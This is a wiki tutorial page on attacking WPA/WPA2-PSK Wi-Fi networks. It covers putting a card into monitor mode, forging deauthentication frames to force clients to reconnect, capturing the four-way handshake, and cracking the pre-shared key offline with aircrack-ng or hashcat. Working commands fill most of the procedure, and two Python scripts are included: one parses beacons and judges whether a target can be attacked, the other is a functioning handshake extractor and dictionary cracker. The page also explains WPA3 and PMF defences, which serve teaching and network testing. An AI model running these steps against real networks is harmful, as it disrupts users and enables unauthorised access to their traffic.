Difference between revisions of "WPA/WPA2 PSK deauthentication attack"
Edit summary: Added WPA2 cracking without aircrack-ng plus further improvements
Revision as of 16:53, 10 April 2020
Summary
How to sniff a WPA/WPA2 four-way handshake with the help of a deauthentication attack and crack the Pre-Shared Key (PSK) offline. Aircrack-ng is a versatile suite for analysing and attacking wireless networks, but it is not the only option. This guide uses GNU/Linux to demonstrate aircrack-ng and macOS to show that the same result can be reached with tcpdump and hashcat, without aircrack-ng. The two workflows can be mixed to suit your situation.
Requirements
Mandatory
GNU/Linux
- Install aircrack-ng suite:
sudo apt install aircrack-ng
Application | Description |
aircrack-ng | 802.11 WEP and WPA/WPA2-PSK key cracking program. |
airbase-ng | Multi-purpose tool aimed at attacking clients (rogue access point) as opposed to the AP itself. |
airdecap-ng | Decrypt WEP/WPA/WPA2 capture files once the key is known. |
airdecloak-ng | Remove WEP Cloaking™ from a packet capture file. |
airdrop-ng | A rule-based wireless deauthentication tool. |
aireplay-ng | Inject and replay wireless frames (including deauthentication frames). |
airgraph-ng | Graph wireless networks from airodump-ng CSV output. |
airmon-ng | Enable and disable monitor mode on wireless interfaces. |
airodump-ng | Capture raw 802.11 frames and list access points and stations. |
airolib-ng | Store ESSID/passphrase lists and precompute their PMKs to speed up cracking. |
airserv-ng | Wireless card TCP/IP server to share one card with multiple applications. |
airtun-ng | Virtual tunnel interface creator. |
packetforge-ng | Create encrypted packets that can be used for injection. |
macOS
- Install Homebrew, the Missing Package Manager for macOS (or Linux). The Ruby installer in use when this page was written has been retired; the current one-liner is published at https://brew.sh:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
- Optional: Install aircrack-ng suite:
brew install aircrack-ng
- Install tcpdump:
brew install tcpdump
- Install wireshark to use mergecap:
brew install wireshark
- Enable the 'hidden' airport command-line tool by linking it into the PATH. It ships with the macOS 10.14 used here; Apple removed it in macOS 14.4, so on current systems capture with tcpdump or Wireshark and query status with wdutil info instead:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
Optional
Hashcat
- Clone the Git repository (cap2hccapx, used below, lives in the separate hashcat-utils repository: https://github.com/hashcat/hashcat-utils):
git clone https://github.com/hashcat/hashcat.git
- Build. make install needs root and puts hashcat on the PATH; use either it or the symlink below, not both:
cd ./hashcat && make && sudo make install
- Link. The symlink target must be an absolute path; ln -s ./hashcat would create a link that is resolved relative to /usr/local/bin and dangles:
sudo ln -s "$(pwd)/hashcat" /usr/local/bin/hashcat
Background
Problem
Attacks on wireless networks exploit the fact that IEEE 802.11 only encrypts the payload of data frames (in WPA2 normally with AES-CCMP). Management frames such as beacons and deauthentication frames are sent in the clear and, unless Protected Management Frames (802.11w) are negotiated, are not authenticated either, so anyone in range can read them and forge them. The EAPOL frames of the four-way handshake are also unencrypted. An attacker first captures a beacon frame to learn the network name (SSID), the MAC address of the access point (BSSID) and its channel (radio frequency). With that, packets of that network can be sniffed at will. To join the network or decrypt its traffic, the WPA2 Pre-Shared Key (PSK) is still required, and obtaining it takes only three steps, plus some time:
- Sniff a beacon management frame containing all information about the network
- Sniff a four-way handshake; it carries the two nonces and a Message Integrity Code (MIC) computed with a key derived from the PSK, which is enough to verify a guess offline
- Crack the PSK offline, using the data captured in the previous steps
Note: Intercepting a four-way handshake requires at least one authenticated device on the target network.
Note: The first two steps have to be done in range of the target network. The last step takes the longest, but has the advantage that it can be executed anywhere.
Solution
The most recent standard, WPA3, is designed to protect against such offline dictionary attacks. With WPA2 an attacker has unlimited offline attempts at guessing the PSK, because the four-way handshake between client and access point lets every guess be checked against the captured MIC. WPA3 replaces that handshake with Simultaneous Authentication of Equals (SAE), a widely analysed password-authenticated key exchange in which every guess costs an online exchange with the access point and the captured traffic offers nothing to test a guess against. SAE also provides forward secrecy, and WPA3 makes Protected Management Frames mandatory, so forged deauthentication frames are discarded. A WPA3 network in transition mode still accepts WPA2-PSK clients, and those handshakes remain exposed to the attack described here.
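Step 1 above, done by hand: an added Python example (not code from this page or from aircrack-ng) that parses a captured beacon frame and returns the SSID, channel and BSSID together with the RSN information element, i.e. the ciphers, the AKM suites (PSK versus SAE) and the RSN capability bits MFPC/MFPR that decide whether a forged deauthentication frame will be honoured at all. The two beacons it analyses are constructed in memory with made-up BSSIDs; the frame and IE layouts follow IEEE 802.11. Feed it a raw 802.11 frame (strip the radiotap header first if the capture has one).

```python
"""Beacon / RSN IE parser: added example, not code from this page or from aircrack-ng.
Input is a raw 802.11 beacon frame (pcap link type 105; cut off radiotap if present)."""
import struct

SUITE_OUI = bytes.fromhex("000fac")                       # IEEE 802.11 RSN suite selector OUI
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104", 6: "BIP-CMAC-128", 8: "GCMP-128"}
AKMS = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256", 6: "PSK-SHA256",
        8: "SAE", 9: "FT-SAE"}
MFPR, MFPC = 0x0040, 0x0080                                # RSN Capabilities bits (802.11w)


def suite_name(selector: bytes, table: dict) -> str:
    if selector[:3] != SUITE_OUI:
        return f"vendor-{selector[:3].hex()}:{selector[3]}"
    return table.get(selector[3], f"type-{selector[3]}")


def parse_rsn(ie: bytes) -> dict:
    """RSN IE (tag 48): version, group cipher, pairwise ciphers, AKM suites, capabilities."""
    version = struct.unpack_from("<H", ie, 0)[0]
    group = suite_name(ie[2:6], CIPHERS)
    count, pos = struct.unpack_from("<H", ie, 6)[0], 8
    pairwise = [suite_name(ie[pos + 4 * i:pos + 4 * i + 4], CIPHERS) for i in range(count)]
    pos += 4 * count
    count, pos = struct.unpack_from("<H", ie, pos)[0], pos + 2
    akm = [suite_name(ie[pos + 4 * i:pos + 4 * i + 4], AKMS) for i in range(count)]
    pos += 4 * count
    caps = struct.unpack_from("<H", ie, pos)[0] if pos + 2 <= len(ie) else 0   # field is optional
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akm,
            "mfpc": bool(caps & MFPC), "mfpr": bool(caps & MFPR)}


def parse_beacon(frame: bytes) -> dict:
    """Pull SSID, channel, BSSID and the RSN IE out of a beacon's tagged parameters."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc & 0x00FC) != 0x0080:                             # type 0 (management), subtype 8 (beacon)
        raise ValueError("not a beacon frame")
    capability = struct.unpack_from("<H", frame, 34)[0]    # after timestamp(8) + beacon interval(2)
    info = {"bssid": frame[16:22].hex(":"), "privacy": bool(capability & 0x0010),
            "ssid": None, "channel": None, "rsn": None}
    pos = 36
    while pos + 2 <= len(frame):
        tag, length = frame[pos], frame[pos + 1]
        data = frame[pos + 2:pos + 2 + length]
        if len(data) != length:
            raise ValueError("truncated information element")
        if tag == 0:
            info["ssid"] = data.decode("utf-8", "replace")
        elif tag == 3 and length == 1:                      # DS Parameter Set
            info["channel"] = data[0]
        elif tag == 48:
            info["rsn"] = parse_rsn(data)
        pos += 2 + length
    return info


def assess(info: dict) -> tuple:
    """(deauthentication will be obeyed, handshake is crackable offline, reason)."""
    rsn = info["rsn"]
    if rsn is None:
        return False, False, "no RSN IE (open, WEP or WPA1 vendor IE): out of scope for this page"
    crackable = any(a in ("PSK", "PSK-SHA256", "FT-PSK") for a in rsn["akm"])
    if rsn["mfpr"]:
        return False, crackable, "PMF required: clients discard forged deauthentication frames"
    if not crackable:
        return True, False, "no PSK AKM (e.g. SAE): nothing to test a passphrase guess against"
    if rsn["mfpc"]:
        return True, True, "PMF optional: only clients that did not negotiate it can be deauthenticated"
    return True, True, "WPA2-PSK without PMF: deauthentication and offline cracking apply"


def build_beacon(bssid: bytes, ssid: str, channel: int, akm_type: int, rsn_caps: int) -> bytes:
    """Constructed beacon for the demo: CCMP-128 group and pairwise cipher, one AKM, given RSN caps."""
    header = struct.pack("<HH6s6s6sH", 0x0080, 0, b"\xff" * 6, bssid, bssid, 0)
    fixed = struct.pack("<QHH", 0, 100, 0x0411)             # timestamp, 100 TU, ESS|Privacy|ShortSlot
    ccmp = SUITE_OUI + b"\x04"
    rsn = (struct.pack("<H", 1) + ccmp + struct.pack("<H", 1) + ccmp
           + struct.pack("<H", 1) + SUITE_OUI + bytes([akm_type]) + struct.pack("<H", rsn_caps))
    ies = bytes([0, len(ssid)]) + ssid.encode() + bytes([3, 1, channel]) + bytes([48, len(rsn)]) + rsn
    return header + fixed + ies


if __name__ == "__main__":
    for frame in (build_beacon(bytes.fromhex("703acb000001"), "TestNet", 6, 2, 0x000C),
                  build_beacon(bytes.fromhex("703acb000002"), "SecureNet", 36, 8, 0x00CC)):
        info = parse_beacon(frame)
        print(info["ssid"], info["bssid"], "ch", info["channel"], info["rsn"]["akm"], assess(info)[2])
```

The same check applied to a real capture saves time in both directions: a target that advertises MFPR is not worth deauthenticating, and a target whose only AKM is SAE yields a handshake that no wordlist can be tested against.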
Procedure
With aircrack-ng (on GNU/Linux)
Put your interface in monitor mode
- List the wireless interfaces and their drivers with airmon-ng:
airmon-ng
PHY     Interface       Driver          Chipset
phy0    wlan0           iwlwifi         Intel Corporation Wireless 7260 (rev 83)
- Kill the processes that interfere with monitor mode (NetworkManager, wpa_supplicant and friends). Do this before starting monitor mode, otherwise the interface may be switched back to managed mode behind your back:
airmon-ng check kill
Killing these processes:
  PID Name
  895 wpa_supplicant
- Start monitor mode, locked to the target channel (9 in this example). airmon-ng creates a new interface, here wlan0mon, and all later commands use that name:
airmon-ng start wlan0 9
- Variant used in the course: if the managed interface has been removed first with iw wlan0 del, airmon-ng finds the PHY without an interface and offers to create one as wlan0mon; monitor mode is then started on that interface:
airmon-ng
Found phy0 with no interfaces assigned, would you like to assign one to it? [y/n] y
PHY     Interface       Driver          Chipset
phy0    wlan0mon        iwlwifi         Intel Corporation Wireless 7260 (rev 83)
airmon-ng start wlan0mon 9
- Check with iw dev that the interface reports type monitor before capturing.
Capture Beacon
- Find the target with wireshark or airodump-ng (airodump-ng hops through all channels until told otherwise):
airodump-ng wlan0mon
- From its output you will need:
- BSSID (MAC address of the access point): <bssid>
- Access point channel: <channel>
- MAC address of a victim, a wireless client associated with the WPA2 network (listed in the STATION section)
Warning: A beacon alone does not give you the PSK, and with this step you cannot be sure that a four-way handshake was recorded. See the deauthentication attack section.
Capture handshake
- Lock on the target channel and BSSID and write everything to psk-*.cap, waiting for a client to connect or forcing one to reconnect with a deauthentication attack. airodump-ng prints WPA handshake: <bssid> in the top-right corner once it has seen one:
airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon
Warning: Without the deauthentication attack you depend on a client connecting by itself, so you cannot be sure that a four-way handshake was recorded. See the deauthentication attack section.
Crack with aircrack-ng
- Download a password list, for example from https://github.com/danielmiessler/SecLists/blob/master/Passwords/, and let aircrack-ng try every candidate against the captured handshake:
aircrack-ng -w <passwordlist path> -b <bssid> psk*.cap
aircrack-ng lists the number of handshakes it found per BSSID before it starts cracking; if it reports none for the target, capture again.
Reset network configuration
Note: Do not forget to turn off monitor mode and restart the network manager, otherwise the machine stays without network access.
- Stop monitor mode
airmon-ng stop wlan0mon
- Restart the network manager for internet access (on systemd-only distributions: systemctl restart NetworkManager)
service network-manager restart
Without aircrack-ng (on macOS)
airport -h
Supported arguments:
 -c[<arg>] --channel=[<arg>]  Set arbitrary channel on the card
 -z        --disassociate     Disassociate from any network
 -I        --getinfo          Print current wireless status, e.g. signal info, BSSID, port type etc.
 -s[<arg>] --scan=[<arg>]     Perform a wireless broadcast scan.
                              Will perform a directed scan if the optional <arg> is provided
 -x        --xml              Print info as XML
 -P        --psk              Create PSK from specified pass phrase and SSID.
                              The following additional arguments must be specified with this command:
                                 --password=<arg>  Specify a WPA password
                                 --ssid=<arg>      Specify SSID when creating a PSK
 -h        --help             Show this help
Note: airmon-ng, airodump-ng and aireplay-ng do not work on macOS; the macOS build of aircrack-ng is only useful for the cracking step.
Note: airport exists exclusively on macOS.
Capture Beacon
# Scan for nearby networks
sudo airport -s
                            SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
                        ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -72  11      Y  de WPA2(PSK/AES/AES)
                        ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -57  1       Y  de WPA2(PSK/AES/AES)
                        ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -66  36      Y  de WPA2(PSK/AES/AES)
Note down the SSID (the cracking tools need it as the PBKDF2 salt), the BSSID and the channel. The SECURITY column shows the AKM and ciphers; a network that only offers WPA3/SAE cannot be cracked with this procedure.
Capture Handshake
The Easy way
# Sniff on the target channel; Ctrl-C to stop capturing
sudo airport $INTERFACE sniff $CHANNEL
Note: It saves the .cap capture file to /tmp and displays the path plus filename.
Warning: With this method you cannot be sure that a four-way handshake was recorded. See the deauthentication attack section.
The Good way
With airodump-ng or airport sniff a large number of unnecessary packets are captured, and you cannot know for sure whether a handshake has been intercepted until you abort the capture and inspect it. With tcpdump, BPF filters keep only the beacon and the EAPOL frames.
- Disassociate from any network; the card cannot stay associated while it sniffs another channel: (-z --disassociate)
sudo airport -z
- Set the card to the target channel: (-c[<arg>] --channel=[<arg>])
sudo airport -c$CHANNEL
- Capture one beacon frame from the AP; it carries the SSID, which the cracking tools need as the PBKDF2 salt. -I switches the interface to monitor mode, without it no 802.11 frames are visible:
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i $INTERFACE -w beacon.cap
- Wait for the WPA handshake. The filter keeps only EAPOL frames (ethertype 0x888e) to or from the AP, and -U flushes every frame to the file at once. Run the deauthentication attack now if no client connects by itself, and stop with Ctrl-C once the four EAPOL-Key messages have scrolled by (or add -c 4 to stop automatically; retransmissions can make that four frames without a complete handshake, so check the file either way):
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i $INTERFACE -w handshake.cap
- Merge the two files
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
Warning: tcpdump only filters; it does not wait for a complete handshake by itself. Open handshake.cap in Wireshark with the display filter eapol and confirm that messages 1 and 2 (or 2 and 3) of the same exchange are present before moving on. See the deauthentication attack section for how to provoke one. The beacon is captured within a fraction of a second.
Crack PSK
The .cap file obtained in the previous steps can be cracked directly only with aircrack-ng. It is more effective to convert it and use hashcat (GPU) or John the Ripper.
- Convert .cap to .hccapx (cap2hccapx is part of hashcat-utils)
cap2hccapx capture.cap capture.hccapx
Note: Alternatively, use the tool online: https://hashcat.net/cap2hccapx/ (uploading a handshake hands the target's SSID, BSSID and client MAC to a third party).
- Crack using a simple dictionary attack (hash mode 2500 = WPA-EAPOL-PBKDF2):
hashcat -m 2500 capture.hccapx wordlist.txt
Note: Current hashcat releases deprecate mode 2500 and the hccapx format in favour of the 22000 hash-line format written by hcxpcapngtool from hcxtools: hcxpcapngtool -o capture.22000 capture.cap followed by hashcat -m 22000 capture.22000 wordlist.txt.
Note: Refer to the official Hashcat documentation, https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2, for more examples and variations to crack the PSK.
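Steps 2 and 3 of the procedure, checked and executed by hand: an added Python example (not code from this page, aircrack-ng or hashcat) that reads a classic pcap such as handshake.cap or psk-01.cap, groups the EAPOL-Key frames per access point and client, reports which of the four messages were captured and whether messages 1 and 2 belong to the same exchange (the check the tcpdump section lacks), and then runs the offline test the cracking tools perform: PBKDF2-HMAC-SHA1 over passphrase and SSID gives the PMK, PRF-512 gives the PTK, and its first 128 bits (the KCK) reproduce the MIC of message 2 only for the right passphrase. The demo capture, BSSID, client MAC, nonces and passphrase are constructed; the frame layouts are those of IEEE 802.11 and 802.1X. It reads raw 802.11 (link type 105) and radiotap (127) pcaps but not pcapng, and it does not implement the AES-CMAC MIC of the SHA256-based AKMs.

```python
"""Handshake check and offline PSK test. Added example, not code from this page, aircrack-ng or hashcat; it runs
the derivation those tools use (PBKDF2 -> PMK, PRF-512 -> PTK, KCK -> EAPOL MIC) over a classic pcap of raw
802.11 frames as written by tcpdump -I or airodump-ng. The demo capture at the bottom is constructed."""
import hashlib
import hmac
import struct

LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")          # LLC/SNAP header for ethertype 0x888e
ACK, MIC, SECURE = 0x0080, 0x0100, 0x0200                   # EAPOL-Key "Key Information" bits
MIC_OFF = 81                                                # MIC field offset inside the EAPOL frame

def pcap_frames(data: bytes):
    """Yield 802.11 frames from a classic pcap: link type 105 (raw) or 127 (radiotap header stripped)."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if endian is None: raise ValueError("not a classic pcap (pcapng is not handled here)")
    linktype, pos = struct.unpack_from(endian + "I", data, 20)[0], 24
    while pos + 16 <= len(data):
        incl_len = struct.unpack_from(endian + "IIII", data, pos)[2]
        frame, pos = data[pos + 16:pos + 16 + incl_len], pos + 16 + incl_len
        if linktype == 127:                                 # radiotap length field is always little-endian
            frame = frame[struct.unpack_from("<H", frame, 2)[0]:]
        elif linktype != 105:
            raise ValueError(f"unsupported link type {linktype}")
        yield frame

def eapol_from_frame(frame: bytes):
    """(bssid, station, eapol) for an unprotected 802.11 data frame carrying EAPOL, else None."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 3 != 2 or fc & 0x4000: return None      # not a data frame, or Protected bit set
    to_ds, from_ds = bool(fc & 0x0100), bool(fc & 0x0200)
    hdr = 24 + (6 if to_ds and from_ds else 0) + (2 if fc & 0x0080 else 0)   # addr4, QoS control
    if frame[hdr:hdr + 8] != LLC_SNAP_EAPOL: return None
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    bssid, sta = (a1, a2) if to_ds else (a2, a1) if from_ds else (a3, a2)
    return bssid, sta, frame[hdr + 8:]

def find_handshakes(capture: bytes) -> dict:
    """Per (bssid, station): messages seen, replay counters, ANonce from M1, SNonce and full frame of M2."""
    pairs = {}
    for frame in pcap_frames(capture):
        hit = eapol_from_frame(frame)
        if hit is None or hit[2][1] != 3: continue          # EAPOL type 3 = EAPOL-Key
        bssid, sta, eapol = hit
        hs = pairs.setdefault((bssid.hex(":"), sta.hex(":")), {"seen": set(), "replay": {}})
        key_info = struct.unpack_from(">H", eapol, 5)[0]    # M1: Ack; M2: MIC; M3: Ack+MIC; M4: MIC+Secure
        n = (3 if key_info & MIC else 1) if key_info & ACK else (4 if key_info & SECURE else 2)
        hs["seen"].add(n)
        hs["replay"][n] = eapol[9:17]
        if n == 1:
            hs["anonce"] = eapol[17:49]
        elif n == 2:
            hs["snonce"], hs["msg2"] = eapol[17:49], eapol
    for hs in pairs.values():                               # crackable: M1 and M2 of the same exchange
        hs["ok"] = {1, 2} <= hs["seen"] and hs["replay"][1] == hs["replay"][2]
    return pairs

def derive_ptk(pmk: bytes, bssid: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11 PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max(MAC) || min/max(nonce))."""
    data = min(bssid, sta) + max(bssid, sta) + min(anonce, snonce) + max(anonce, snonce)
    return b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))[:64]

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL frame with its MIC field zeroed; the Key Descriptor Version picks the algorithm."""
    version = struct.unpack_from(">H", eapol, 5)[0] & 0x0007
    algo = {1: hashlib.md5, 2: hashlib.sha1}.get(version)   # 1 = TKIP HMAC-MD5, 2 = CCMP HMAC-SHA1-128
    if algo is None: raise ValueError("Key Descriptor Version 3 (AES-128-CMAC) not handled here")
    return hmac.new(kck, eapol[:MIC_OFF] + bytes(16) + eapol[MIC_OFF + 16:], algo).digest()[:16]

def crack_psk(ssid: str, pair: tuple, hs: dict, wordlist):
    """Dictionary attack: a candidate is right when its KCK reproduces the MIC of message 2."""
    bssid, sta = [bytes.fromhex(mac.replace(":", "")) for mac in pair]
    target = hs["msg2"][MIC_OFF:MIC_OFF + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63: continue          # WPA passphrase length rule; skip the PBKDF2
        pmk = hashlib.pbkdf2_hmac("sha1", candidate.encode(), ssid.encode(), 4096, 32)
        kck = derive_ptk(pmk, bssid, sta, hs["anonce"], hs["snonce"])[:16]   # KCK = first 128 bits of PTK
        if hmac.compare_digest(eapol_mic(kck, hs["msg2"]), target):
            return candidate
    return None

def demo_capture(ssid: str, passphrase: str, bssid: bytes, sta: bytes) -> bytes:
    """Constructed link-type-105 pcap: M1 AP->STA with ANonce, M2 STA->AP with SNonce and a valid MIC."""
    def eapol_key(key_info, nonce):                         # RSN descriptor, key length 16, replay counter 1
        body = b"\x02" + struct.pack(">HHQ", key_info, 16, 1) + nonce + bytes(48) + b"\x00\x00"
        return struct.pack(">BBH", 2, 3, len(body)) + body
    def data_frame(eapol, to_ds):                           # ToDS for STA->AP, FromDS for AP->STA
        a1, a2, a3 = (bssid, sta, bssid) if to_ds else (sta, bssid, bssid)
        fc = 0x0008 | (0x0100 if to_ds else 0x0200)
        return struct.pack("<HH6s6s6sH", fc, 0, a1, a2, a3, 0) + LLC_SNAP_EAPOL + eapol
    anonce, snonce = bytes(range(32)), bytes(range(100, 132))
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    kck = derive_ptk(pmk, bssid, sta, anonce, snonce)[:16]
    m1, m2 = eapol_key(ACK | 0x000A, anonce), eapol_key(MIC | 0x000A, snonce)   # Pairwise | version 2
    m2 = m2[:MIC_OFF] + eapol_mic(kck, m2) + m2[MIC_OFF + 16:]
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
    return header + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f
                             for f in (data_frame(m1, False), data_frame(m2, True)))

if __name__ == "__main__":
    cap = demo_capture("TestNet", "correct horse", bytes.fromhex("703acb000001"), bytes.fromhex("a45e60000002"))
    for pair, hs in find_handshakes(cap).items():
        print(pair, "messages:", sorted(hs["seen"]), "crackable:", hs["ok"])
        print("PSK:", crack_psk("TestNet", pair, hs, ["password", "12345678", "correct horse"]) if hs["ok"] else "-")
```

The SSID is not part of the handshake, which is why the beacon is captured as well: it is the PBKDF2 salt, and the same passphrase on a differently named network yields a different PMK and MIC. Messages 3 and 4 are not needed for cracking; what matters is that message 1 and message 2 come from the same exchange, which the replay counter check enforces.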
Deauthentication attack
Use one of the methods below to force devices on the target network, if any, to deauthenticate. Deauthentication frames are management frames that carry no cryptographic protection unless 802.11w Protected Management Frames are in use, so an attacker can send them with the spoofed source address of the AP (or of the client) and the recipient obeys. When the client reconnects, a four-way handshake is exchanged between the client and the AP, which can be captured easily. The deauthenticated target may notice a short network disruption, but nothing more. Against a network that requires PMF (mandatory with WPA3) forged deauthentication frames are discarded and this attack fails.
Warning: Deauthers are often mistakenly described as jammers, even though that is not the case: they send valid protocol frames, not radio noise.
Note: A four-way handshake can be analysed with Wireshark, filtering for eapol.
Aircrack-ng
aireplay-ng -0 1 -a $BSSID -c $VICTIM_MAC wlan0mon
- -0 means deauthentication
- 1 number of deauthentication bursts to send (0 = keep sending until stopped); aireplay-ng reports "Sending 64 directed DeAuth" per burst
- -a BSSID, the MAC address of the access point
- -c MAC address of the client to deauthenticate; without -c a broadcast deauthentication is sent, which some clients ignore
The interface must be in monitor mode on the AP's channel and the card must support injection. Keep airodump-ng running in a second terminal on the same channel so the handshake that follows is written to the capture file.
DSTIKE Deauther
DSTIKE provides a range of ESP8266-based development boards that ship with the ESP8266 Deauther firmware developed by Spacehuhn. The source code is available on GitHub. With this firmware you can perform different attacks to test WiFi networks; one of them is the deauthentication attack. As the ESP8266 has a 2.4 GHz radio only, 5 GHz networks are out of its reach.
- https://github.com/spacehuhn/esp8266_deauther
Other tools
JamWiFi is a macOS application with a GUI that lets you select one or more nearby wireless networks, then presents a list of the clients currently active on them and allows you to disconnect clients by performing a deauthentication attack.
- https://github.com/unixpickle/JamWiFi
- https://github.com/0x0XDev/JamWiFi
Used Hardware
- Notebook, Ubuntu 18.04 bionic amd64, with Wifi interface card
- MacBook Pro (15-inch, 2017), macOS 10.14.6, Airport Extreme (Broadcom BCM43xx 1.0)
- DSTIKE Deauther Watch V1
Courses
- Campus Cyber Security Team WiFi Hacking 21.06.2019
References
- https://www.aircrack-ng.org/doku.php?id=cracking_wpa
- https://www.aircrack-ng.org/doku.php#aircrack-ng_suite1
- https://www.netspotapp.com/wifi-encryption-and-security.html
- https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html
- http://www.saltwaterc.eu/capturing-wpa-handshakes-with-os-x.html
- https://github.com/brannondorsey/wifi-cracking
- https://hashcat.net/cap2hccapx/
- https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2